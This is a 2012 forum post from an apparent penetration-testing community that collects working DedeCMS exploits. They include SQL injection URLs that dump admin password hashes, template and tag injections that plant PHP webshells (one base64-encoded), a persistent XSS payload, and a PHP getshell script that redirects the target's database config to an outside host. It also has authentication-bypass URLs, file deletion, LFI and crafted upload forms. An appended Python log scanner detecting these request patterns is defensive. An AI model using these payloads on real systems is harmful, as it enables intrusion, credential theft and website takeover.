China Network Penetration Testing Alliance

Title: dedecms vulnerability summary

Author: admin    Time: 2012-10-18 10:42

Dedecms 5.6 rss injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload software; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line shell written directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 block URL-type XSS, so the XSS filter must be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; from then on, visiting any of the URLs below triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// only the HTTP status line is read back; "OK" beyond offset 12 means "HTTP/1.1 200 OK"
if (strpos($exp,"OK")>12){
    echo "Exploit Success \n";
    if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n";
    if($aid==2)echo "Shell:".$url."/$path/fuck.php\n";
    if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    // request variables in _COOKIE[GLOBALS][cfg_*] form override the site's database settings
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "No response from ".$host."\n";
        return "";
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you enter the site backend directly.
The precondition for this vulnerability is that the backend path must be known.

Dedecms (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourselves...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image, then in attachment management replace the image with our carefully crafted template; for example the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(this is the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports the edit succeeded, we have successfully changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password is the 32-character MD5 with the first 5 and last 7 characters removed, giving a 20-character MD5; then remove 3 from the front and 1 from the end to get the 16-character MD5.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits the error raised by a MySQL numeric field overflow together with DEDECMS logging database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.
2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following information proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the information from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
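Most of the getshell and backend-bypass items in this thread rely on the same thing: request parameters named _POST[GLOBALS][cfg_*], _COOKIE[GLOBALS][cfg_*] or bare cfg_* being registered into DedeCMS configuration. As an added example that is not part of the original post, the Python below scans web access logs for those request shapes, plus the advancedsearch sql=, rss _Cs[], gotopage, edit_face oldface and carbuyaction code patterns listed here; the log lines, the trailing quoted POST-body field and the signature labels are my own constructions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# (label, request-path pattern or None, parameter-name pattern, value pattern or None)
SIGNATURES = [
    # config override via _GET/_POST/_COOKIE[GLOBALS] arrays (mytag_js.php, login.php)
    ("globals-override", None, r"^_(GET|POST|COOKIE)\[GLOBALS\]", None),
    # bare cfg_* request variables (select_soft_post.php with register_globals on)
    ("cfg-override", None, r"^cfg_", None),
    # raw SQL handed to advancedsearch.php
    ("advancedsearch-sql", r"/plus/advancedsearch\.php$", r"^sql$", None),
    # _Cs[] array injection in rss.php
    ("rss-cs-injection", r"/plus/rss\.php$", r"^_Cs\[", None),
    # script markup reflected through the gotopage parameter of login.php
    ("gotopage-xss", r"/login\.php$", r"^gotopage$", r"<script|javascript:"),
    # path traversal in edit_face.php oldface and carbuyaction.php code
    ("edit-face-traversal", r"/member/edit_face\.php$", r"^oldface$", r"\.\./"),
    ("carbuyaction-lfi", r"/plus/carbuyaction\.php$", r"^code$", r"\.\./"),
]

# Combined log format plus one assumed trailing quoted field for the POST body.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<body>[^"]*)")?'
)

# Constructed sample lines (documentation addresses): five requests shaped like
# the ones in this thread and one ordinary listing request.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512
203.0.113.5 - - [18/Oct/2012:10:42:02 +0800] "GET /dede/login.php?dopost=login&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=203.0.113.9 HTTP/1.1" 302 0
203.0.113.5 - - [18/Oct/2012:10:42:03 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 77 "doaction=x&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9&nocache=true"
203.0.113.5 - - [18/Oct/2012:10:42:04 +0800] "POST /include/dialog/select_soft_post.php HTTP/1.1" 200 91 "activepath=/data/cache/&cfg_basedir=../../&job=upload"
203.0.113.5 - - [18/Oct/2012:10:42:05 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024
198.51.100.7 - - [18/Oct/2012:10:43:00 +0800] "GET /plus/list.php?tid=3 HTTP/1.1" 200 4096
"""

def classify_request(target, body=""):
    """Return the signature labels matched by one request.

    target is the request-URI as logged; body is the urlencoded POST body
    when the log records it (empty for GET). Both are decoded first, so
    %5BGLOBALS%5D and a literal [GLOBALS] are treated alike."""
    parts = urlsplit(target)
    params = parse_qsl(parts.query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    hits = []
    for label, path_re, name_re, value_re in SIGNATURES:
        if path_re and not re.search(path_re, parts.path):
            continue
        for name, value in params:
            if re.search(name_re, name) and (
                value_re is None or re.search(value_re, value, re.IGNORECASE)
            ):
                hits.append(label)
                break
    return hits

def scan_log(lines):
    """Return (ip, target, labels) for every log line matching a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify_request(m.group("target"), m.group("body") or "")
        if labels:
            findings.append((m.group("ip"), m.group("target"), labels))
    return findings

if __name__ == "__main__":
    for ip, target, labels in scan_log(SAMPLE_LOG.splitlines()):
        print(ip, ",".join(labels), target)
```

Decoding before matching matters: the mytag_js.php request above carries its override as %5BGLOBALS%5D in the body, while the login.php one uses literal brackets in the query string, and both are reported under the same label.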





Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2